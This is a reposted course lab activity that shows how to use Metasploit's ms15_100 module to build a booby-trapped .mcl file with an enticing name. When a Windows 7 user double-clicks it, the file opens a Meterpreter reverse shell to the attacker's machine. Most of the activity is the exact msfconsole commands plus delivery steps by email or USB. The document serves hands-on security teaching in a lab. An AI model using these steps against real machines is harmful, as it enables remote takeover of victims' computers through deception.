Unit 4: Exploits and Exploiting 4.3 Activity and Discussion Activity: Windows 7 File Exploit

ACTIVITY: WINDOWS 7 FILE EXPLOIT

This activity is ungraded.

  • Note: This will only work on a Windows 7 target machine. It will not work on Windows 10.

Software: In this activity you will use these applications and resources that are included in the Kali VM:

  • Metasploit
  • Meterpreter
Downloads

You’ll need a Windows 7 system. It can be your host machine, or another device altogether. If neither of those conditions are possible, you can download a free legal Windows 7 VM. In your hypervisor, you might need to add the Network Adapter before starting the VM.

Time: This activity should take you approximately 30 minutes to complete.

Goal
  • To prepare a malicious file that will create a remote session on a Windows 7 machine when double clicked.
Instructions

Note: Hit Enter after each command.

Before you begin: Make sure that the Windows 7 VM is running in bridged mode (in a separate VMware Hypervisor instance), and is on the same subnet as the Kali box. Turn off the Firewall on the Windows 7 system, and make sure the Windows 7 system and the Kali box can ping each other.

  1. Inside of msfconsole, execute the following commands. Make sure you read all output:
  • search ms15_100
  • use exploit/windows/fileformat/ms15_100_mcl_exe
  • info
  • set filename secretjonathanvideos.mcl
  • set file_name secretjonathanvideos.exe
  • set payload windows/meterpreter/reverse_tcp
  • set lhost [IP ADDRESS OF YOUR KALI BOX]
  • set lport 7777
  • exploit
  1. Notice the output, indicating the location where this file was created, for example /root/.msf4/local/secretjonathanvideos.mcl.
  2. In addition to the file created, a handler was started on the Kali box that will wait for a callback from the target Windows 7 machine when the file is double clicked.
  3. Open up another terminal and enter cp /root/.msf4/local/secretjonathanvideos.mcl /root/Desktop. This will copy the file to your Kali desktop.
  4. Either using Guest Additions, email, or a USB drive, copy that file over to your Windows 7 machine.
  5. Double click the file in the Windows host machine, and click View Now in the security warning.
  6. In Kali, you will see a notification that a Meterpreter session has been established.
  7. Enter sessions –l to see the sessions listed.
  8. Enter sessions –i [number of the session showing in the ID column]. For example: sessions -i 1
  9. Enjoy your meterpreter shell! If you're using the free Microsoft Windows 7 VM (which is limited), some Meterpreter commands that I did in the Demo Videos will not work. If you're using your own Windows 7 copy, feel free to replicate everything I did in the demo videos! :-)

After you've finished, complete the activities below. Please be as brief as you can in your responses (five words or less).

转载于:https://www.cnblogs.com/sec875/articles/10028589.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值